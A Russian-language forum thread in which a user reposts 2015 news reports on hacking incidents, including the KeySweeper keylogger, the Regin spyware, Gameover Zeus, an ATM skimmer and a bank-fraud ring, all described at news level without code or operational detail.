Сама же компания со 100-процентной уверенностью сообщает, что ни один из рассмотренных случаев не был результатом взлома систем Apple, включая облачное хранилище iCloud или «Найти мой iPhone».

SAWWA
16.01.2015, 07:12
В китайскую USB-зарядку внедрили шпионские функции


15.01.2015, 19:11 Текст: Антон Благовещенский
http://www.zamkidveri.com/forum/images/imported/2015/01/iide7494b0710863217e125b7db909ba9bc80144-1.jpg
Исследователь в области информационной безопасности Сами Камкар сумел превратить китайское зарядное устройство с USB-выходом в полноценный шпионский инструмент, пишет Venture Beat.
Созданный им гаджет под названием KeySweeper представляет собой аппаратный кейлоггер (перехватчик нажатий клавиш) для беспроводных клавиатур Microsoft. Он способен "ловить" сигнал, который передается между клавиатурой и приемником, расшифровывать его и запоминать всю пересылаемую информацию.
В памяти KeySweeper могут храниться данные о нажатых клавишах, включая введенные в строку браузера интернет-адреса, логины, пароли и другая конфиденциальная информация. По желанию владельца миниатюрный шпион может отправлять различные SMS-сообщения с необходимым ему содержимым - в гаджет можно вставить SIM-карту с подключением к мобильному интернету.

В основу KeySweeper лег дешевый микроконтроллер Arduino, состоящий из миниатюрной материнской платы и чипа для беспроводной передачи данных. Стоимость изготовления шпиона начинается от 10 долларов и может доходить до 80 долларов, в зависимости от его возможностей, отмечает Сами Камкар. По его словам, на разработку KeySweeper с нуля ему понадобилось всего несколько дней.

Примечательно, что благодаря встроенному аккумулятору миниатюрный шпион может работать даже после отключения от розетки.

Сами Камкар утверждает, что занимается этим лишь для того, чтобы производитель беспроводных клавиатур обратил внимание на то, что передающиеся "по воздуху" данные шифруются недостаточно надежно. В свою очередь, представители Microsoft сообщили Venture Beat о том, что в курсе разработок Камкара и занимаются их исследованием.

http://media2.24aul.ru/imgs/400x800/5142d6764ffdaa1ad8e6b2b3

rg. ru

SAWWA
17.01.2015, 14:04
Хакеры взломали аккаунт New York Post и «устроили» Третью мировую

35014
В «Твиттере» издания появилось сообщение о поражении китайской ракетой атомного авианосца ВМС США «Джордж Вашингтон».

Первое сообщение гласило, что одна из противокорабельных ракет, принадлежащих Китайской Народной Республике, поразила американский атомный сверхтяжелый авианосец «Джордж Вашингтон».

Вторая «новость» касалась проведения Федеральной резервной системой США экстренного заседания, по итогам которого американский центробанк якобы планировал объявить о введении отрицательной процентной ставки.

Буквально за несколько минут ложные сообщения набрали несколько сотен ретвитов. Распространиться новостям не дал один из редакторов издания, который оперативно сообщил в микроблоге о взломе аккаунта.

Через несколько минут все опубликованные хакерами сообщения были удалены, ответственность за атаку пока не взяла ни одна хакерская организация.

Чуть позже стало известно о взломе аккаунта информационного агентства Юнайтед пресс интернэшнл. В микроблоге этого СМИ хакеры разместили такие же новости, как и на страничке «Нью-Йорк пост», а также добавили «заявление» папы Римского Франциска о начале Третьей мировой войны.

Любопытно, что хакерские атаки произошли сразу после того, как президент США Барак Обама и премьер-министр Великобритании Дэвид Кэмерон объявили о решении создать совместную группу, которая будет заниматься вопросами безопасности в киберпространстве.

SAWWA
26.01.2015, 23:50
ХАКЕРЫ МОГУТ ПРОНИКНУТЬ В СИСТЕМЫ УПРАВЛЕНИЯ АВТОМАТИЧЕСКИМИ НАЛИВНЫМИ РЕЗЕРВУАРАМИ
computerra .ru
http://www.zamkidveri.com/forum/images/imported/2015/01/01189500x282-1.jpg

На автозаправках США хакеры способны проникнуть в систему управления резервуаров для нефтепрдуктов и изменить их калибровку. К этому выводу пришли эксперты компании Rapid7, проведя проверку установленных систем контроля. Уязвимость была обнаружена Джеком Чадовицем, основателем службы мониторинга заправочных станций BostonBase. В США в настоящее время около 115 тысяч таких станций, из них уязвимости подвержены около 5,3 тысяч АЗС.

т.о. предприимчивые дельцы могут торговать топливом налево при определённом желании

SAWWA
27.01.2015, 00:11
http://www.zamkidveri.com/forum/images/imported/2015/01/01102-1.jpg
ЛИШЬ 5% РОССИЯН ЗАДУМЫВАЮТСЯ О БЕЗОПАСНОСТИ ФИНАНСОВЫХ ОНЛАЙН-ТРАНЗАКЦИЙ. Об этом свидетельствуют данные исследования, проведенного компанией B2B International летом 2014 года. При этом 56% россиян совершают операции в системах интернет-банкинга, а 58% — регулярно оплачивают покупки в Сети. 18% опрошенных используют для операций с деньгами мобильные устройства. При этом, только 34% пользователей отдает предпочтение дешевым или бесплатным антивирусам.

SAWWA
29.01.2015, 01:03
С помощью игрушки удалось «взломать» турникет московского метро
Mr.Adamson 28 ноября 2014

С помощью фигурки Amiibo одному из пользователей сети Instagram удалось открыть турникет в московском метрополитене. Однако пройти на станцию мужчине не удалось, так как турникет захлопнул створки.
http://www.zamkidveri.com/forum/images/imported/2015/01/lO6iksq_1-1.jpg

У специалистов появилось несколько версий произошедшего. Во-первых, компания Nintendo может использовать в своих изделиях чипы, похожие на те, которые применяются в московском метрополитене. Известно, что в Amiibo встроена система бесконтактной ближней связи и такая же применяется в транспортной системе Москвы. Согласно второй версии, умелец мог сам модифицировать игрушку.
Игрушки Amiibo выполнены в виде известных игровых персонажей. Например, в виде Марио – персонажа популярной одноименной игры. Конкретно на записи можно видеть Самус Аран (героиня игровой серии Metroid). Такие фигурки используются в качестве дополнений к игровой приставке Wii U.

NpWMCCFmp-k

SAWWA
29.01.2015, 17:51
Новое шпионское ПО поразило экспертов своим совершенством

Эксперты по информационной безопасности сообщили об обнаружении ранее незамеченной шпионской программы Regin. По мнению аналитиков, данное вредоносное ПО могло быть разработано только на уровне спецслужбы или даже целого государства, настолько оно технически совершенно.

После проведенного анализа эксперты сделали вывод, что Regin существует не менее шести лет и за это время неоднократно использовалась для шпионажа за интернет-провайдерами и телекоммуникационными компаниями России, Саудовской Аравии, а также Мексики, Ирландии и Ирана.

Каким именно способом распространяется эта программа и каковы ее цели при проникновении на компьютер жертвы, пока не до конца ясно. Известно лишь, что Regin умеет делать скриншоты зараженного компьютера, получать доступ к паролям и восстанавливать удаленные файлы, пишет crmdaily.ru.

SAWWA
25.02.2015, 18:59
Награда 3 миллиона $ за информацию о хакере

Американские власти объявили награду в размере до $3 млн за информацию о российском хакере Евгении Богачеве. Представители госдепартамента, Минюста США и ФБР уверены, что мужчина связан с бандой киберпреступников из России и Украины, заразившей посредством специального ПО более миллиона компьютеров по всему миру и причинившей ущерб более чем на $100 млн.
Награда установлена в рамках программы борьбы с транснациональной организованной преступностью, созданной Конгрессом США в 2013 году и находящейся в ведении госдепартамента, сообщает ТАСС.
По данным Минюста США, Богачев и его сообщники использовали вредоносную программу Gameover Zeus для несанкционированного доступа к пользовательским данным, в том числе банковской информации для осуществления незаконных денежных переводов на принадлежащие им счета. Командные серверы Gameover Zeus находились в Киеве и Донецке и были обезврежены украинскими властями в координации с ФБР.
Предполагается, что группировка Богачева использовала программу-вымогатель Cryptolocker. Специалисты считают, что от нее пострадали более 230 компьютеров по всему миру, половина из которых находится в США.
Среди пострадавших от действий хакерской группировки — банки, предприятия и племя индейцев.

SAWWA
03.03.2015, 00:16
Названы 10 главных недостатков и уязвимостей в 2014 году

Компания «Информзащита» представила аналитику по результатам более 40 проектов в области информационной безопасности (ИБ) в 2014 году. В ходе исследования экспертами компании были выделены 10 самых распространённых уязвимостей и недостатков. Объектом комплексных и технических аудитов ИБ выступали компании из самых разных отраслей бизнеса: финансы и телеком, транспортные организации и нефтегазовая промышленность.Процесс управления доступом по-прежнему лидирует по количеству обнаруженных уязвимостей. Некорректные пароли и использование небезопасных протоколов удалённого доступа — лидеры списка недостатков, даже несмотря на возрастающую осведомлённость сотрудников в области ИБ. Другим источником проблем является использование протокола TELNET, который известен своей небезопасностью.
Защита информации, по мнению авторов исследования, во многих компаниях является вопросом второстепенным. Средства защиты не всегда являются оптимальными и настраиваются «на авось». На «самоход» оказываются пущены изменения ИТ-инфраструктуры и оценка рисков информационной безопасности. Всё это приводит к появлению уязвимостей и нерациональному расходованию средств на обеспечение защиты.
По мнению экспертов «Информзащиты», главными недостатками и уязвимостями в области информационной безопасности в 2014 году стали:
1. Некорректная парольная политика
2. Использование небезопасного протокола TELNET
3. Некорректный или отсутствующий аудит событий
4. Плохо настроенные правила фильтрации трафика для межсетевых экранов
5. Неправильная сегментация сети. Серверные сегменты не отделены от пользовательских
6. Не обновляемое вовремя ПО
7. Некорректная настройка сетевого оборудования
8. Отсутствие системы оповещений для обнаружения вторжений
9. Использование небезопасных протоколов для удалённого доступа с помощью технологии VPN
10. Некорректная настройка ограничения прав доступа к системным файлам.
Все эти уязвимости, отмечают в «Информзащите», могут позволить злоумышленнику повысить свои привилегии в системе вплоть до административных, особенно если это инсайдер. Такое положение дел грозит как утечкой критичных данных, так и нарушением деятельности компании в целом.
http : //www.3dnews.ru/909680?from=related-grid&from-source=909907

SAWWA
03.03.2015, 11:52
У многих гомельчан заблокировали карточки из-за установленного на банкомате скиммера

http://www.zamkidveri.com/forum/images/imported/2015/03/776115_1_24495357-1.jpg?version=1320238865
24 февраля в банкомате Белорусбанка в центре Гомеля, по улице Советской, 44 (перекресток улицы Советской и проспекта Победы), обнаружили скиммер. Это миниатюрное считывающее устройство, которое мошенники прикрепляют к банкоматам, чтобы похищать деньги с чужих карточек.
Корреспондент «Комсомолки» узнал об этом, когда его карточку перестали обслуживать банкоматы. После звонка в банк выяснилось, что все карточки, которые в тот день гомельчане вставляли в банкомат со скиммером, банк заблокировал для того, чтобы с них не похитили деньги. Новые карты клиентам изготовят в 7-дневный срок, а пока деньги со счета можно снять в тех банках, которые выдавали карточки.
mvd.gov.by

SAWWA
02.06.2015, 14:11
Полиция задержала хакеров, которые украли с банковских счетов более 11 миллионов российских рублей (больше 200 тысяч долларов). Жертвами киберпреступников стали клиенты крупных банков, включая Сбербанк и ВТБ24.

​​20 мая правоохранительные органы задержали киберпреступников, которые на протяжении почти четырех лет похищали с банковских счетов клиентские деньги, говорится в сообщении Group-IB. Расследование преступлений и задержание происходили при содействии Group-IB и службы безопасности Сбербанка России.

Организаторами хакерских атак на банковские счета оказались два брата-близнеца из Санкт-Петербурга. Они уже были осуждены за подобные деяния и на момент совершения преступлений уже имели условный и испытательный сроки. Преступники продолжали воровать деньги с банковских счетов даже во время судебного разбирательства по прошлому уголовному делу.

Братья начали атаковать счета граждан в конце 2011 года, установить их личности удалось только в середине 2012 года. На то, чтобы собрать доказательную базу, правоохранительным органам и Group-IB потребовалось еще три года.

С 2013 по 2015 год преступники получили доступ к более чем 7 тысячам счетов клиентов различных российских банков. Средняя сумма хищений составляла около 70 тысяч российских рублей, но иногда хакерам удавалось похитить у одного клиента и более миллиона, а средний месячный доход злоумышленников варьировался от 500 тысяч до 1,5 миллиона российских рублей (от 9 до 28 тысяч долларов), рассказал РБК заместитель руководителя отдела расследований инцидентов информационной безопасности Group-IB Сергей Лупанин. "Уголовное дело возбуждено по 813 эпизодам, нескольким статьям преступлений в сфере компьютерной информации, а также по статье о мошенничестве в особо крупном размере, общей суммой более 11 миллионов российских рублей", - рассказал он.

По данным двух источников РБК, жертвами этой группировки стали клиенты крупных банков, включая Сбербанк и ВТБ24. Пресс-службы этих учреждений не ответили на запрос РБК к моменту публикации материала.

Злоумышленники использовали разные вредоносные программы (в 2011 и 2012 годах они использовали вирус Qhost, в 2012-м и 2014-м - вирус rpcss.dll, в 2014 году - KINS, в 2015-м - Tinba). Целью хакеров было получить номер мобильного телефона жертвы. Одни программы перенаправляли клиентам банков на фишинговые страницы (интернет-страницы, внешне практически не отличимые от настоящих банковских сайтов), на которых у пользователя запрашивают логин и пароль, а также номер телефона. Другие вирусные программы позволяли спросить номер телефона прямо на настоящих сайтах банков. Дальше злоумышленники звонили клиентам и просили сообщить СМС-коды для подтверждения совершаемых платежей. Если клиенты не соглашались, хакеры отправляли им сообщения от имени банка с требованием сообщить коды звонившему мошеннику.

Вредоносные программы, которыми "заражались" жертвы, хакеры распространяли через взломанные сайты, спам и целевые рассылки.

Задержание не стало для преступников полной неожиданностью: квартира была оборудована бронированной дверью, внутри находился электромагнитный излучатель для уничтожения компьютерной техники, также у братьев были заготовлены специальные кодовые СМС-сообщения, по которым любой из участников группы начинал процесс уничтожения данных. Во время задержания хакеры пытались уничтожить доказательства и смыть в канализацию все деньги, флешки и телефоны.

По данным РБК

SAWWA
11.07.2015, 00:48
Новый Android-вирус может следить за пользователем после отключения смартфона
Новый изощрённый вирус поражает устройства на ОС Android и может следить за пользователем, даже если смартфон выключен, сообщает аналитическая компания AVG.
http://www.zamkidveri.com/forum/images/imported/2015/07/1424680227_androidmalware1024x645pngw300-1.jpg
Новый вирус получил название PowerOffHijack. Он работает очень необычным образом — получает контроль за процессом выключения смартфона или планшета. Когда пользователь выключает устройство, внешне ничего необычного не происходит — демонстрируется заставка и выключается экран, после чего устройство кажется выключенным, но на самом деле продолжает шпионить за владельцем. В таком режиме смартфон может делать снимки, совершать звонки, отправлять сообщения, записывать звук.

В компании AVG сообщили, что большая часть заражённых устройств находится в Китае, где вирус был замечен впервые. Всего количество инфицированных гаджетов приближается к 10 000. PowerOffHijack распространяется через неофициальные магазины мобильных приложений. Он инфицирует устройства под управлением Android ниже версии 5.0 и требует root-доступа для своей активации.

Последние версии антивирусных продуктов AVG могут распознать угрозу, но специалисты компании советую пользователям, которые хотят быть уверенными в безопасности, извлекать из устройства батарею при каждом отключении. Только в этом случае можно дать гарантию, что смартфон выключен, отмечают в компании
3dnews.ru

SAWWA
25.08.2015, 21:50
Хакеры научились взламывать Gmail через холодильники Samsung

Холодильники производства Samsung, как и многие другие девайсы компании, оборудованы различными смарт-функциями. В частности, они могут показывать записи из календаря Google, используя соответствующий аккаунт пользователя.
http://udf.by/uploads/posts/2015-08/thumbs/1440512041_6e87191bb361d5a725937df6b66fe44b.jpg
Специалисты Pen Test Partners смогли отыскать эксплойт «человек посередине», который позволяет перехватывать данные, проходящие между сервером и устройством.
http://udf.by/uploads/posts/2015-08/thumbs/1440512066_d0f934bf1fe4618f3ce8e3285ae51cd2.jpg
Хакеры научились взламывать Gmail через холодильники Samsung

Изъян в безопасности обнаружили в модели RF28HMELBSR — четырехдверном холодильнике с 8-дюймовым LCD-экраном и модулем Wi-Fi. Холодильник поддерживает защищенный SSL-протокол, но не справляется с проверкой SSL-сертификатов. Это делает устройство уязвимым к атакам хакеров, которые подключились к сети: они без проблем способны украсть учетные данные для входа в аккаунт Google.

Хакеры научились взламывать Gmail через холодильники Samsung

В свою очередь, это может лишить пользователей контроля над их почтой Gmail и аккаунтами на других сервисах, где пользователь проходил регистрацию со своего Google-ящика.

SAWWA
18.10.2015, 14:11
Российские хакеры украли закрытую информацию бизнес-агентств США
Артем Филипенок, РБК
http://udf.by/js/timthumb.php?src=http://udf.by/uploads/posts/2015-10/1445050892_754450270934840.jpg&w=862&zc=1&q=100
Фото: Bloomberg
Группа российских хакеров украла закрытую информацию компании Dow Jones, владеющей бизнес-изданием Wall Street Journal, а также ряда других агентств с целью получения прибыли.

Как сообщает Bloomberg со ссылкой на четырех человек, знакомых с ходом расследования, ФБР и другие американские спецслужбы выясняют обстоятельства взлома компьютерными мошенниками из России серверов Dow Jones, на которых содержалась бизнес-информация, которая еще не была обнародована.

Пока нет данных, содержалась ли в украденных материалах инсайдерская информация. Известно, что хакеры похитили в том числе материалы, которые должны были через некоторое время быть опубликованы в Wall Street Journal. Bloomberg отмечает, что эта информация могла повлиять на рыночные цены акций отдельных компаний.

Официальный представитель Dow Jones Колин Шварц никак не прокомментировал информацию о краже закрытой бизнес-информации компании. От комментариев отказалась и пресс-секретарь Нью-йоркского офиса ФБР.